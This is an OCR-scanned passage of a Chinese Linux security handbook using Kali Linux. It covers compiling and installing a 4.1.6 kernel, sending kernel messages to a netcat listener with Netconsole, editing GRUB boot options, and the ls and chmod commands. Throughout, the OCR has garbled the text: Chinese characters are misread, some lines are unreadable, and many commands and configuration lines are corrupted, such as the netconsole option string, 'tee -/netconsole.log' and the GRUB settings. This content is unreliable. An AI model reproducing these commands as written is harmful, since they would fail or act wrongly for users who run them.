HOSTCC  scripts/kconfig/mconf.o 
SHIPPED scripts/kconfig/zconf.tab.c 
SHIPPED scripts/kconfig/zconf.lex.c 
SHIPPED scripts/kconfig/zconf.hash.c 
HOSTCC  scripts/kconfig/zconf.tab.o 
HOSICC  scripts/kconfig/lxdialog/checklist.o 
HOSTCC  scripts/kconfig/lxdialog/util.o 
HOSICC  scripts/kconfig/lxdialog/inputbox.o 
HOSICC  scripts/kconfig/lxdialog/textbox.o 
HOSTCC  scripts/kconfig/lxdialog/yesno.o 
HOSTCC  scripts/kconfig/lxdialog/menubox.o 
HOSTLD scripts/kconfig/mconf 
scripts/kconfig/mconf Kconfig 
# 
# using defaults found in /boot/config-3.12-kalil-486 
# 
/boot/config-3.12-kalil-486:1/15:warning: symbol value 'm' invalid for BMPO85 


*** End of the configuration. 
*** Execute 'make' to start the build or try 'make help' 


8. 如 果 你 当前 的 账号 没有 管理 员 权 限 ， 那 么 企 上 述 命 令 前 需要 使 用 Sudo。 


9. 执 行 上 述 命令 后 ， 会 弹出 一 个 窗口 ， 上 面 有 菜单 项 的 列表 ， 如 下 图 所 示 。 选 择 要 更 新 配置 的 项 目 。 


Arrow keys navigate the menu. <Enter> selects submenus ---> (or empty submenus ----). 
Highlighted letters are hotkeys. Pressing «Y» includes, <N> excludes, «M» modularizes 
features. Press «Esc»«Esc» to exit, «?» for Help, </> for Search. Legend: [*] built-in [ ] 
excluded «M» module < > module capable 


EA R-E kasaa 
i a. bit nu - d IC |, 


eneral setup ---> 
[*] Enable loadable module support ---> 
[*] Enable the block layer ---> 

rocessor type and features ---> 

ower management and ACPI options ---> 

us options (PCI etc.) ---> 

xecutable file formats / Emulations ---> 
[*] Networking support ---> 

evice Drivers  ---- 

irmware Drivers  ----» 

ile systems ---> 

ernel hacking ---> 
v(+) 

«Select» < rx < Help > < Save > < Load > 


10. 选 中 File systems 荣 单项 。 


Linux/x86 4.1.6 Kernel Configuration 
Arrow keys navigate the menu. «Enter» selects submenus ---- (or empty submenus ----). 
Highlighted letters are hotkeys. Pressing «Y» includes, «N» excludes, «M» modularizes 
features. Press «Esc»«Esc» to exit, «?» for Help, </> for Search. Legend: [*] built-in [ ] 
excluded «M> module < > module capable 


64-bit kernel 

General setup ---> 

Enable loadable module support ---> 
Enable the block layer ---> 

Processor type and features  ---- 

Power management and ACPI options  ---- 
Bus options (PCI etc.) ---> 

Executable file formats / Emulations  ---- 
Networking support  ---» 

Device Drivers ---> 

Firmware Drivers  ---» 


= Exit > < Help > < Save > < Load > 


File systems 
Arrow keys navigate the menu. «Enter» selects submenus ---> (or empty submenus ----). 
Highlighted letters are hotkeys. Pressing «Y» includes, «N» excludes, «M» modularizes 
features. Press «Esc»«Esc» to exit, <?> for Help, </> for Search. Legend: [*] built-in [ ] 
excluded «M> module < > module capable 


< > Second extended fs support 

< > Ext3 journalling file system support 
«M- Ihe Extended 4 (ext4) filesystem 

[Ml Use ext4 for ext2/ext3 file systems 
bd Ext4 POSIX Access Control Lists 

e] Ext4 Security Labels 

< > Ext4 Encryption (NEW) 

[ ] -XT4 debugging support 

[ ] JBD2 (ext4) debugging support 

«M» Heiserfs support 

[ ] Enable reiserfs debug mode 

[ Stats in /proc/fs/reiserfs 

[ 
V 


] 
] HeiserFS extended attributes 
十 


) 


»* 
( 
< Exit > < Help > < Save > < Load > 


12. 保 存 配置 。 


Do you wish to save your new configuration? 
(Press <ESC><ESC> to continue kernel configuration.) 


Y « < Mo > 


13. 现 在 开始 编译 Linux 内 核 。 编 译 过 程 需要 大 约 40 到 50 分 钟 才 能 完成 ， 这 取决 于 系统 的 配置 。 运 行 命令 如 下 : 


make -j 5 


编译 过 程 如 下 图 所 示 。 


oot(ükali:/usr/src/linux-4.1.64£ make -j 5 

HOSTCC  scripts/kconfig/conf.o 

HOSTLD scripts/kconfig/conf 

--silentoldconfig Kconfig 

include/config/kernel.release 
scripts/basic/bin2c 
arch/x86/syscalls/../include/generated/asm/syscalls 32.h 
arch/x86/syscalls/../include/generated/uapi/asm/unistd 32.h 
arch/x86/include/generated/asm/clkdev.h 
arch/x86/include/generated/asm/cputime.h 
arch/x86/include/generated/asm/dma -contiguous.h 
arch/x86/include/generated/asm/early ioremap.h 
arch/x86/include/generated/asm/mcs spinlock.h 
arch/x86/include/generated/asm/scatterlist.h 
include/generated/uapi/linux/version.h 
arch/x86/syscalls/../include/generated/uapi/asm/unistd 64.h 
include/generated/uapi/linux/version.h 
arch/x86/syscalls/../include/generated/uapi/asm/unistd x32.h 
include/config/kernel.release 


我 们 首先 下 载 Linux 内 核 源 代码 ， 解 压 到 特定 位 置 ， 然 后 配置 内 核 ， 最 后 编译 内 核 。 


在 化 费 很 多 时 间 配 置 和 编译 内 核 乙 后， 我 们 现在 可 以 在 本 地 系统 上 安 妆 内 核 了 。 


在 开始 安装 内 核 之 前 ,一 定 要 备份 系统 上 所 有 重要 数据 。 此 外 ， 还 需要 把 /boot/ 下 的 内 容 复 制 到 一 个 FAT32 格 式 的 外 部 存 
储 媒介 上 。 如 果 安 六 过 程 失 败 ， 无 论 什么 原因 ， 这 些 备份 都 将 有 助 于 修复 系统 。 


在 完成 内 核 的 编译 之 后 ， 可 以 执行 下 述 命令 开始 安 疹 内 核 。 


1. 运 行 下 述 命令 安 委 驱动 程序 : 


:YUSTVSTCALInUX-4,1.6# make modules install 


这 个 命令 将 把 所 有 模块 复制 到 /lib/modules 下 对 应 内 核 版 本 的 子 目录 中 。 


2. 现 在 ， 运 行 下 面 的 命令 安 妆 实际 的 内 核 : 


make install 


sh ./arch/x86/boot/install.sh 4.1.6 arch/x86/boot/bzImage \ 
System.map "/boot" 

run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.1.6 /boot/vmlinuz-4.1.6 
pdate-initramfs: Generating /boot/initrd.img-4.1.6 
run-parts: executing /etc/kernel/postinst.d/pm-utils 4.1.6 /boot/vmlinuz-4.1.6 
run-parts: executing /etc/kernel/postinst.d/zz-extlinux 4.1.6 /boot/vmlinuz-4.1.6 
: Checking for EXTLINUX directory... found. 

: Writing config for /boot/vmlinuz-4.1.6... 

: Writing config for /boot/vmlinuz-3.12-kalil-486... 

: Updating /boot/extlinux/linux.cfg... 

No volume groups found 

: Installing debian theme... done. 


run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.1.6 /boot/vmlinuz-4.1.6 


background image: /usr/share/images/desktop-base/desktop -grub .png 
linux image: /boot/vmlinuz-4.1.6 

initrd image: /boot/initrd.img-4.1.6 

linux image: /boot/vmlinuz-3.12-kalil-486 

initrd image: /boot/initrd.img-3.12-kalil-486 

memtest86- image: /boot/memtest865-.bin 


memtest86- multiboot image: /boot/memtest86+ multiboot.bin 
No volume groups found 


rootükali:/usr/src/linux-4.1.6$s | 
3. 这 个 命令 将 执行 /sbin/installkernel 文 件 。 


4. 新 内 核 会 被 复制 为 /boot/vmlinuz-{version}， 其 中 {version} 是 内 核 的 实际 版 本 号 。 如 果 符 号 链接 /boot/vmlinuz 已 经 存 
人 在， 那么 /boot/vmlinuz 会 被 更 新 链接 到 新 的 内 核 。 


而 以 前 安装 的 旧 内 核 将 保存 为 /boot/vmlinuz.old，config 和 System.map 文 件 也 在 相同 位 置 。 


5. 接 下 来 ， 运 行 下 面 的 命令 将 内 核 复 制 到 /boot 目 录 : 


cp -v arch/x86/boot/bzImage /boot/vmlinuz-4.1.6 


oot(ükali:/usr/src/linux-4.1.6£ cp -v arch/x8B6/boot/bzImage /boot/vmlinuz-4.1.6 
arch/xB6/boot/bzImage' -> '/boot/vmlinuz-4.1.6' 
ootükali:/usr/src/linux-4.1.64 lj 


6.9Mfr, GUEESUSGRJRAM Za, 


| Li:/usr/src/linux-4.1.642 mkinitramfs -o /boot/initrd.img-4.1.6 /lib/modules/4.1.6/ 
tükali:/usr/src/linux-4.1.64 f 


7. 接 下 来 需要 复制 System.map 文 件 ， 该 文件 包含 了 一 系列 的 内 核 符号 和 对 应 的 地 址 。 为 此 ， 运 行 下 面 的 命令 ， 并 将 内 核 的 
名 称 添加 到 目标 文件 后 面 。 


:/usr/src/linux-4.1.64 cp System.map /boot/System.map-4.1.6 
:/usr/src/linux-4.1.64 


8. 创 建 竺 号 链接 /boot/System.map， 使 其 指向 /boot/System.map-< 你 的 内 核 版 本 >。 


:/usr/src/linux-4.1.64€ ln -sf /boot/System.map-4.1.6 /boot/System.map 
:/usr/src/linux-4.1.64 B 


9. 如 果 /boot 所 在 的 文件 系统 不 支持 符号 链接 ， 则 执行 如 下 命令 ， 把 你 的 新 内 核 复 制 到 /boot/System.map: 


cp /boot/System.map-YourKernelName /boot/System.map 


在 完成 了 内 核 的 配置 和 编译 之 后 ， 我 们 开始 内 核 的 安 滚 过程。 第 一 个 命令 是 把 模块 复制 到 /lib/modules 的 一 个 子 目录 中 。 


第 二 个 命令 是 执行 /sbin/installkernel， 新 的 内 核 将 被 安 六 到 /boot/vmlinuz-{version}。 此 时 ， 如 果 符 号 链 
接 /boot/vmlinuz 已 经 存在 ， 那 么 更 新 /boot/vmlinuz 使 其 链接 到 新 的 内 核 。 以 有 前 安装 的 旧 内 核 将 保存 为 /boot/vmlinuz.old。 
对 config 和 System.map 文 件 执 行 同样 的 步骤 。 


所 有 步骤 完成 之 后 ， 我 们 就 可 以 从 新 的 内 核 重 新 启动 系统 了 。 


2.7 ”测试 和 调试 内 核 


测试 及 调试 是 任何 开放 或 封闭 的 软件 开发 周期 (Software Development Cycle, SDC) 中 的 一 个 重要 组 成 部 分 ， 这 同样 适 
用 于 Linux 内 核 。 测 试 和 调试 的 最 终 目的 是 在 安 容 了 新 的 内 核 之 后 尽快 确保 内 核 工作 正常 。 


28 使 用 Netconsole 配 置 调试 用 控制 合 


如 果 我 们 想 捕 捉 内 核 朋 省 事件 ， 可 一 旦 系统 被 重新 局 动 ， 由 于 没有 创建 该 事件 的 日 志 ， 那 么 要 捕获 它 就 变 得 相当 困难 。 我 们 
可 以 使 用 Netconsole 来 解决 这 个 问题 。 


Netconsole 是 一 个 内 核 模块 ， 它 通过 UDP 协议 记录 内 核 消 息 。 当 不 能 记录 到 本 地 磁盘 时 ， 它 可 帮助 调试 问题 。 


准备 工作 


在 配置 Netconsole 之 前 ,我 们 需要 知道 UDP 数 据 包 将 被 友 送 到 的 系统 的 MAC 地 址 。 访 系统 被 称 为 接收 方 ， 可 以 与 本 机 处 于 
相同 子 网 或 者 不 同 的 子 网 。 这 两 种 情况 描述 如 下 : 


1. 第 一 种 情况 是 接收 方 与 本 机 人 在 同一 个 子 网 中 。 


2. 本 示例 中 ， 接 收 方 的 IP 地 址 是 192.168.1.4。 我 们 将 把 UDP 数据 包 友 送 到 这 个 IP 地 址 。 


:~# ping -c 1 192.168.1.4 > /dev/nullf 


3. 现 在 ， 通 过 执行 下 述 命令 找到 接收 方 系统 的 MAC 地 址 。 该 命令 中 的 IP 地 址 是 接收 方 的 地 址 。 


| :~# arp -n 192.168.1.4 
Address HWtype  HWaddress Flags Mask 
192.168.1.4 ether 90:00:4a:2f:ac:ef C 


4 国 


在 上 面 的 示例 中 ，90: 00: 4e: 2f: ac: ef 就 是 我 们 需要 的 MAC 地 址 。 


4. 第 二 种 情况 是 接收 方 与 本 机 不 在 同一 子 网 中 。 在 这 种 情况 下 ， 我 们 首先 需要 找到 默认 网 天 。 为 此 运行 下 述 命令 : 


:~# netstat -rn | grep ^0.0.0.0 
192.158.1.1 0.0.0.0 G B © ethO 


' Ji 


5. 此 处 ， 黔 认 网 天 是 192.168.1.1。 
6. 我 们 需要 找到 默认 网 天 的 MAC 地 址 。 首 先 ， 以 下 述 方式 向 默认 网 关 友 送 一 个 数据 包 : 


ot@kali:~# ping -c 1 192.168.1.1 > /dev/nullf 


rootükali:-€ arp -n 192.168.1.1 

Address Hwtype HWaddress Flags Mask 
192.168»51-4 ether . c0:3f:0e:10:c6:be C 
rootükali:-X B 


这 里 ，c0: 3f: Oe: 10: c6: be 就 是 我 们 要 找 的 默认 网 天 的 MAC 地 址 。 


有 了 接收 方 的 MAC 地 址 ， 我 们 可 以 开始 配置 Netconsole 了 ，。 


首先 ， 我 们 需要 更 改 启动 时 的 内 核 选项 。 如 果 你 正在 使 用 Grub 作 为 启动 引导 程序 ， 那 么 它 会 默认 启动 内 核 的 “quiet 
splash" 选项 。 因 为 我 们 不 希望 这 样 ， 所 以 需要 改变 内 核 的 选项 。 


1. 首 务 ， 像 下 面 截图 一 样 为 /etc/default/grub 文 件 创建 备份 : 


:~# cp /etc/default/grub /etc/default/grub.backup 
:-4 国 


2. 现 在 ， 使 用 任何 一 种 编辑 器 编辑 /etc/default/grub 文 件 。 


root@kali:~# vi /etc/default/grub 
rootíka!l ] ` i Ed 


3. 在 文件 中 找到 GRUB CMDLINE LINUX DEFAULT= "quiet splash" 这 一 行 ， 将 该 行 蔡 换 为 
GRUB CMDLINE LINUX DEFAULT="debug ignore loglevel", 


# If you change this file, run 'update-grub' afterwards to update 
# /boot/grub/grub.cfg. 

# For full documentation of the options in this file, see: 

# info -f grub -n 'Simple configuration' 


GRUB DEFAULT-O 

GRUB TIMEOUI-5 

GRUB DISTRIBUTOR- lsb release -i -s 2» /dev/null || echo Debian 
GRUB CMDLINE LINUX DEFAULT-"debug ignore loglevel" 

GRUB CMDLINE LINUX-"initrd-/install/initrd.gz" 


4. 现 在 ， 运 行 以 下 命令 更 新 Grub: 


root(lkali:/etc/default£ update-grub N 
Generating grub.cfg ... 
background image: /usr/share/images/desktop-base/desktop-grub.png 
linux image: /boot/vmlinuz-4.1.6 
initrd image: /boot/initrd.img-4.1.6 
linux image: /boot/vmlinuz-3.12-kalil-486 
initrd image: /boot/initrd.img-3.12-kalil-486 
memtest86- image: /boot/memtest86-.bin 
memtest86+ multiboot image: /boot/memtest86- multiboot.bin 
No volume groups found 
done 
root@kali:/etc/default# B 


5. 执 行 完 前 面 的 命令 后 ， 我 们 需要 在 启动 时 初始 化 Netconsole。 为 此 ， 需 要 首先 知道 发 送 方 的 |P 地 址 和 接口 。 这 可 以 使 用 
下 面 截图 所 示 的 命令 来 完成 : 


:~# ifconfig -a 

Link encap:Ethernet  Hwaddr 00:0c:29:4d:90:bc 

inet addr:192.168.1.11 Bcast:192.168.1.255 Mask:255.255.255.0 
inet6 addr: fe80::20c:29ff:fe4d:90bc/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:l 

RX packets:10384 errors:O dropped:O overruns:O frame:0O 


TX packets:3595 errors: dropped:O overruns:O carrier:O 
collisions:O txqueuelen:1000 

RX bytes:2043508 (1.9 MiB) TX bytes:685368 (669.3 KiB) 
Interrupt:19 Base address:0x2000 


6. 我 们 还 需要 接收 系统 的 IP 地 址 和 MAC 地 址 。 可 回 看 一 下 在 准备 工作 中 获得 的 信息 。 


7. 现 在 ,我 们 开始 初始 化 Netconsole。 首 先 ， 将 netconsole 模 块 添 加 到 /etc/modules 中 ， 使 得 它 在 启动 时 能 被 加 载 。 


root(lkali:/etc/defaultZ sh -c 'echo netconsole >> /etc/modules' 
root(ükali:/etc/default£ 


8. 接 下 来 ， 要 配置 合适 的 选项 。 像 下 图 一 样 在 /etc/modprobe.d/netconsole.conf 文 件 中 添加 模块 选项 : 


ootükali:/etc/default£ sh -c 'echo options netconsole netconsole-66660192.168.1.1 
1/eth0,66660192.168.1.4/90:00:4e:2f:ac:ef > /etc/modprobe.d/netconsole.conf' 
ootükali:/etc/default& B 


9. 在 上 述 命 令 中 ， 以 netconsole 开 始 的 部 分 具有 如 下 语法 格式 : 


netconsole-«LOCAL PORT>@<SENDER IP ADDRESS>/<SENDER 


INTERFACE»,«REMOTE PORT>@<RECEIVER IP ADDRESS>/<STEP 1 MAC 
ADDRESS» 


本 例 中 ，<LOCAL PORT> 和 <REMOTE PORT> 都 是 6666。 
10. 接 下 来 ， 我 们 要 设置 接收 方 。 


根据 接收 方 所 使 用 的 Linux 版 本 ， 它 的 设置 命令 可 能 会 有 所 不 同 : 

netcat -l -u 192.168.1.4 6666 | tee -/netconsole.log 
如 果 上 述 命令 出 错 ， 兰 试 不 审 IP 地 址 设置 接收 方 : 

netcat -1 -u 6666 | tee -/netconsole.log 


11. 如 果 你 使 用 的 Linux 有 不 同 的 Netcat 有 版本， 那么 当 你 尝试 使 用 前 面 的 命令 时 会 输出 如 下 错误 消息 : 


rootükali:-€ netcat -l -u 6666 | tee -/netconsole.log 
netcat: in listen mode you must specify a port with the -p switch 
root@kali:~# H 


12. 如 果 看 到 了 前 面 的 错误 消息 ， 可 以 尝试 下 图 中 所 示 的 命令 : 


rootükali:-£ netcat -l -p 6666 | tee -/netconsole.log 


13. 现 在 ， 让 前 面 的 命令 保持 运行 。 
14. 接 下 来 要 检查 Netconsole 是 否 工 作 正 常 。 重 新 局 动 友 送 方 系统 ， 然 后 执行 下 图 中 显示 的 命令 : 


akali:~# dmesg | grep netcon 


.882935] 
.883210] 
.883491] 
.883/54] 


.883999] 
.88427/9] 
.884604] 
DII 


netpoll: 
netpoll: 
netpoll: 
netpoll: 
netpoll: 
netpoll: 
netpoll: 
netpoll: 


netconsole: 
netconsole: 
netconsole: 
netconsole: 
netconsole: 
netconsole: 
netconsole: 
netconsole: 


local port 6666 

local IPv4 address 192.168.1.11 

interface 'ethO' 

remote port 6666 

remote IPv4 address 192.168.1.4 

remote ethernet address 90:00:4e:2f:ac:ef 
device ethOÓ not up yet, forcing it 

carrier detect appears untrustworthy, waitin 


4 seconds 


15. 现 在 ,需要 检查 接收 方 系统 ， 查 看 是 否 已 经 接收 到 了 内 核 消息 。 


16. 一 旦 万 事 俱 备 ， 融 按 下 <Ctrl+C> 键 。 那 么 ， 你 残 可 以 在 ~/netconsole.log 中 得 看 消息 了 。 


为 了 捕获 内 核 衣 演 消 息 ， 我 们 配置 了 Netconsole， 它 能 通过 网 络 记录 消息 。 为 此 ， 我 们 需要 网 络 上 的 另 一 个 系统 作为 接收 
JJe 


首先 ， 我们 试图 确定 接收 方 的 MAC 地 址 。 然 后 ， 修 改 内 核 局 动 选项 。 在 更 新 Grub 之 后 ， 我 们 在 发 送 方 系统 上 初始 化 
Netconsole。 最 后 ， 设 置 接收 方 系统 并 开始 接收 内 核 消息 。 


如 果 使 用 Windows 系 统 作 为 接收 方 ， 那 么 可 以 使 用 Windows 版 的 Netcat， 该 软件 可 以 
从 http://joncraton.org/files/nc111nt.zip 下 载 。 执 行 下 列 步 又 来 设置 Windows 接 收 方 : 


1. 使 用 给 定 链接 下 载 文 件 ， 并 把 它 解 压缩 到 指定 位 置 (本 例 中 ， 解 压 到 C: \Users\Tajindern\Downloads\nc 目 录 ) 。 


2. 打 开 命 令 行 窗口 ， 改 变 当 前 路 径 到 Netcat 解 压 后 的 目录 。 


Microsoft windows [Version 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:NUsersNTajinder»cd \ 
C:\>cd C:NUsersNTajinderNDownloadsMnc 


C: NUsersNTajJinderNXDown loads\nc> 


3. 然 后 运行 下 面 截图 所 示 的 命令 : 


Microsoft windows [Version 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:NUsersNTajinder»cd Downloads ^Mnc 


C:NUsersNTajinderNDownloadsMnc» nc -u -1 -p 6666 192.168.1.3 > netconsole.txt 


4jxEB, 192.168.1.3:£& «RECEIVER IP ADDRESS» ， 即 接收 方 的 地 址 。 


5. 让 上 面 的 命令 保持 运行 ， 同 时 在 友 送 万 系统 上 执行 步骤 9 中 提 人 到 的 命令 。 完 成 操作 后 ， 按 <Ctrlt+C> 键 ， 你 会 
netconsole.txt 文 件 中 看 到 接收 到 的 消息 。 


有 时 ， 内 核 修改 后 系统 可 能 无 法 启动 。 因 此 ， 在 创建 这 些 故 障 的 报告 时 ， 要 包含 调试 的 所 有 信息 ， 这 对 内 核 团 队 解 决 存在 的 
问题 非常 有 用 。 


I FIARE 


如 果 你 想 捕获 启动 时 的 错误 消息 ， 那 么 最 好 删除 内 核 启动 时 的 “quiet” 和 “splash” 选项 ， 这 可 以 让 你 在 屏幕 上 看 到 出 现 
的 消息 。 


要 编辑 局 动 选项 ， 请 执行 下 列 步骤 : 


1. 局 动 系统 。 


2. 在 显示 BIOS 屏 幕 时 ， 按 下 <Shift> 键 并 按 住 它 。 那 么 ，BIOS 引 导 完 后 你 会 看 到 Grub 菜单 。 


GNU GRUB version 1.99-27-4deb7?u2 
KALI LINUX 


GNU/Linux, with Linux 3.12-kalii-486 
Debian GNU/Linux, with Linux 3.12-kalli-486 í(recaveru made) 
Memory test tmemtest86+) 
Memory test (memtest86-, se 
Memory test (memt eS ze zh 
Memory test S 


lal console 115200) 
ieprimental multiboot) 
ial console 115200, experimental multiboao- 


1f 
H 
fs 


C 


3. 导 航 到 你 要 局 动 的 内 核 项 ， 然 后 按 <e> 键 。 


Vm, BER “quiet” 和 “splash” 关 键 词 ， 它 们 可 以 从 以 Linux 开 始 的 行 中 找到 。 


GNU GRUB version 1.99-27+deb7u2 


KALI LINUM 
setparams "Debian GNU/Linux, with Linux 3.12-kalii-486' 


load video 
insmod ezio 
insmod part. msdaos 
insmod exte 
set root- (hdO,msdosi) 

ch --no-floppy --fs-uuid --set-root 8e759038-5 
ae26f 9dà 

Loading Linux 3.12-kalii-488 ... 

/boat/vmlinuz-3.12-kalii-486 root-UulID-2887539038-5 

-27d2ae2679d4 ro initrd=/instally initrd. gz guiet_ 
echo ‘Loading initial ramdisk .. 
initrd /boot/initrd.img-3.12-kallii-486 


Minimum Emacs-like screen editing is supported. TAB lists 
completions. Press Ctrl-x or Ctrl-c ar F2 far 

a command-line or ESC to discard edits and return to the GRUB 
Jaep 


5. 按 下 <Ctrl+x> 键 启动 系统 。 
这 时 ， 如 果 有 错误 消息 的 话 ， 你 可 以 在 屏幕 上 看 到 。 


根据 错误 消息 的 类 型 不 同 ， 你 还 可 以 尝试 一 下 其 他 的 局 动 选项 。 例 如 ， 如 果 你 关注 ACPI 错 误 ， 那 么 尝试 acpi=off 局 动 选 


第 3 草本 地 文件 系统 安全 


本 章 将 讨论 如 下 主题 : 
-使 用 ls 命令 查看 文件 和 目录 详情 
:使 用 chmod 命 令 改变 文件 许可 权限 
` 使 用 访问 控制 列表 
` 使 用 mv 命令 处 理 文 件 (移动 和 重 命名 ) 


. 在 Ubuntu 上 安装 并 配置 一 个 基本 的 LDAP 服 务 器 


3.1 ”使 用 Is 命令 全 看 文件 和 目录 评 情 


ls 命令 被 用 来 列 出 目录 下 所 包含 的 文件 ， 它 和 DOS 中 的 dir 命 令 较 为 相似 。 这 个 命令 可 以 配合 各 种 参数 的 使 用 来 得 到 不 同 的 
结果 。 


准备 工作 
因为 |s 合 令 是 Linux 的 内 置 售 令 ， 使 用 时 不 需要 额外 安 委 。 
操作 指南 


现在 ,跟着 下 面 给 出 的 这 些 步骤 ， 看 看 如 何 通 过 多 种 万 式 使 用 ls 命令 来 得 到 各 种 不 同 的 结果 。 


1. 在 shell 终 喘 键入 ls 命令 ,可 以 查看 当前 目录 下 文件 的 简要 列表 信息 : 


rootükali:-4£ cd / 
rootükali:/$ ls 

© etc 

bin example 


boot home 
dev initrd. img 
root@kali:/# 


2.1s 命 令 增加 一 个 类 型 标识 符 


rootükali:/1 ls -FC 
() etc/ 

bin/ | example/ 
boot/ M home/ 

dev/ . initrd.img(Q 
root(kal L: /# 


Lib opt run sys vmlinuz 
Lost+found permissions.acl sbin 

media proc selinux : 

mnt root SFV 


选项 “-FC”， 可 以 得 到 当前 目录 下 文件 和 目录 更 多 的 信息 : 


lib/ opt/ run/ sys/ vwmlinuz( 
lost+found/  permissions.acl sbin/ tmp 
media/ proc/ selinux/ usr/ 
mnty root/ srv/ var / 


当 使 用 上 述 命令 时 ， 不 同类 型 的 文件 和 目录 有 不 同 的 标记 ， 例 如 ， 可 执行 文件 在 名 称 尾部 有 一 个 星 号 ， 目 录 和 在 名 称 尾 部 有 一 


个 冬 线 等 。 


3.1s 命 令 使 用 “-|” 选 项 可 获取 更 多 关于 文件 和 目录 的 信息 ， 如 创建 时 间 、 所 有 者 、 访 问 权限 等 。 如 下 图 所 示 : 


rootükali:/X ls -l 
total 92 

-rw-r--r-- root 
drwxr-xr-x root 
drwxr-xr-x root 
drwxr-xr-x root 
drwxr-xr-x root 
drwxr-xr-x Userl 
drwxr-xr-x root 


root 8 2014 0 

root 8 2014 bin 
root 8 2014 boot 
root 28 15:18 dev 
root 28 16:08 etc 
root 23 17:54 example 
root 28 14:05 home 


4. 运 行 “ls-a” 命 令 可 以 查看 包括 隐藏 文件 在 内 的 所 有 当前 目录 下 的 文件 。 如 下 图 所 示 : 


root(ükali: 


bin etc initrd. img media jpermissions.acl run srv usr 
boot example lib mnt proc sbin Sys var 


() dev home lost*found opt root selinux WIS vmlinuz 
root@kali:/# 


以 点 开头 的 文件 (通常 称 为 点 文件 ) 是 隐藏 文件 ， 如 果 不 使 用 “-a” 选 项 是 不 显示 出 来 的 。 


5. 将 “-h” 选 项 和 “-|” 选项 一 同 使 用 ， 能 以 可 读 性 更 好 的 诸如 KB、MB、GB、TB 的 形式 取代 以 byte 为 单位 列 出 当前 各 文 


件 的 大 小 。 如 下 图 所 示 : 


rootükali:/X ls -lh 

total 92K 

-rw-r--r-- root root 8 2014 © 
drwxr-xr-x root root 4. 8 2014 bin 


drwxr-xr-x root root 4. 8 2014 boot 
drwxr-xr-x root root 3. 28 15:18 dev 
drwxr-xr-x root root 28 15:08 etc 
drwxr-xr-x userl root 4. 23 17:54 example 
drwxr-xr-x root root 4. 28 14:05 home 


6. 如 果 仅 想 列 出 当前 目录 下 的 子 目 录 信 息 而 不 包括 其 他 文件 ， 则 可 以 使 用 “-d” 选 项。 如 下 图 所 示 : 


rootükali:/Z ls -d */ 

bin/  etc/ lib/ mt/  root/ selinux/ [MI 
boot/ example/ lost+found/  opt/ run/ srv/ usr / 
dev/ | home/ nedia/ proc/ sbin/ sys/ var/ 
root@kall:/# i 


7.ls 命 令 配合 “-R” 选 项 使 用 可 以 列 出 子 目 录 中 包含 的 内 容 。 如 下 图 所 示 : 
root(ükali:/example£ ls -R 
accounts permissions.acl 


./accounts: 
dirl 


./accounts/dirl: 
rootükali:/example£s g 


当 结 合 不 同 选项 使 用 Is 命 令 时 ， 它 会 将 目录 下 包含 的 内 容 以 不 同 的 结果 呈现 出 来 。 可 以 根据 目 己 的 需求 选择 不 同 的 选项 。 


在 此 推荐 养 成 使 用 Is-lah 的 习惯 ,可 以 每 次 都 将 文件 大 小 以 可 读 性 更 强 的 方式 展现 出 来 。 


.| | 全 全 JAR 


一 mia am m~ Ns A y ri L 号 
d , | 让 II TIDUBID 3 : "254 p 1 Wj] J * Y DI 


Chmod 命 令 (Change Mode) 是 Linux 系 统 中 用 来 改变 文件 或 目录 访问 权限 的 命令 。 每 个 用 户 都 希望 确保 目 己 的 数据 安全 
上 且 组 织 合理 。 出 于 这 个 考 碟 ，Linux 对 每 个 文件 和 目录 都 天 联 一 个 拥有 者 和 用 户 组 。 拥 有 者 和 用 户 组 对 同一 个 文件 具有 不 同 的 访 
问 权限 。 


在 学 习 chmod 命 令 不 同 的 用 法 之 前 ， 需 要 先 了 解 不 同类 型 的 用 户 及 代表 它们 的 符号 : 

:ua 代 表 文 件 或 目录 的 所 有 者 

-8g 文 件 或 目录 所 属 的 组 

. o 除 了 文件 或 目录 的 所 有 者 或 所 属 组 之 外 ， 其 他 用 户 均 属 于 此 范围 

现在 ， 创 建 一 个 文件 并 命名 为 testfile.txt， 然 后 试 着 用 chmod 命 令 的 不 同 组 合 去 更 改 这 个 文件 的 访问 权限 。 
操作 指南 


接 下 来 ,我们 看 一 下 如 何 通 过 使 用 chmod 命 令 ， 结 合 不 同 的 参数 来 设置 文件 的 不 同 访问 权限 。 


1. 如 果 想 为 用 户 (拥有 者 、 用 户 组 或 其 他 人 ) 更 改 某 个 单一 的 权限 ,使 用 “+” 添 加 这 个 权限 即 可 。 例 如 ， 下 面 这 条 命令 : 


chmod u+x testfile.txt 


这 个 命令 会 使 文件 的 拥有 者 具有 对 这 个 文件 的 执行 权限 : 


root(ükali:-£ chmod U+X testfile.txt 
rootükali:-4 ls -l testfile.txt 


-rwxr--r-- 1 root root 39 Nov 23 18:27 testfile.txt 
root(kkali:-4 


2 RARAMEN, BEBAURILUBI—Iü S7. Ree AESA aA, SU RIBUXRSBT: 


chmod g«x, o-x testfile.txt 


FRR c SARERA FB? EUER PER EUG OCUERSEACHIR : 


rootükali:-4X chmod g+x,o+x testfile.txt 
rootükali:-£X ls -l testfile.txt 


-rwxr-xr-x 1 root root 39 Nov 23 18:27 testfile.txt 
rootükali:-£ B 


3. 如 果 想 移 除 用 尸 的 某 种 权限 ， 只 需要 使 用 “-” 来 替代 “+”， 如 下 面 这 条 命令 : 


chmod o-x testfile.txt 


这 条 命令 将 去 除 其 他 用 户 对 这 个 文件 的 执行 权限 : 


rootükali:/example£ ls -l testfile.txt 
-rwxr-xr-x 1 root root 39 Nov 30 02:36 testfile.txt 
rootükali:/example£ chmod o-x testfile.txt 


rootükali:/example£ ls -l testfile.txt 
-rwxr-xr-- 1 root root 39 Nov 30 02:36 testfile.txt 
root(ükali:/example£ 


4. 如 果 我 们 想 添 加 或 移 除 所 有 用 户 (拥有 者 、 用 户 组 或 其 他 人 ) 的 某 种 权限 ， 可 以 通过 一 条 使 用 了 “a” 选 项 的 命令 来 完 
成 。“a” 选 项 指 代 所 有 用 尸 ， 如 下 面 命令 所 示 。 


为 所 有 用 户 添 加 读 权限 ， 使 用 下 面 这 条 命令 : 


chmod a+r testfile.txt 
移 除 所 有 用 户 的 读 权限 ， 使 用 下 面 这 条 命令 : 


chmod a-r testfile.txt 


